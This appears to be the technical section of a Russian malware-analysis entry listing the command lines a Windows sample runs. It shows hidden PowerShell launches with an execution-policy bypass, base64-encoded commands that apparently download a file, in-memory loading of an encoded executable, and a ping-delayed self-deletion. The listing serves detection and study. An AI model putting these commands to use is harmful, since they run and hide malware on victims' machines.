Техническая информация
- nul
- '<SYSTEM32>\cmd.exe' /c powershell -v 4 -WindowStyle hidden -executionpolicy bypas -encoded JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdABlAG0AcAAuAGwAbwBnACcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQ...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -v 4 -WindowStyle hidden -executionpolicy bypas -encoded JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdABlAG0AcAAuAGwAbwBnACcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAnAGgA...
- '<SYSTEM32>\cmd.exe' /c powershell -v 4 -WindowStyle hidden -executionpolicy bypas -co "[Reflection.Assembly]::Load([Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -v 4 -WindowStyle hidden -executionpolicy bypas -co "[Reflection.Assembly]::Load([Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAA...
- '<SYSTEM32>\cmd.exe' /c powershell -v 4 -WindowStyle hidden -executionpolicy bypas -encoded JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdABlAG0AcAAuAGwAbwBnACcAOwAkAGQAYQAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQ...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -v 4 -WindowStyle hidden -executionpolicy bypas -encoded JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdABlAG0AcAAuAGwAbwBnACcAOwAkAGQAYQAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGQA...
- '<SYSTEM32>\cmd.exe' /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "<Полный путь к файлу>"
- '<SYSTEM32>\ping.exe' 1.1.1.1 -n 1 -w 3000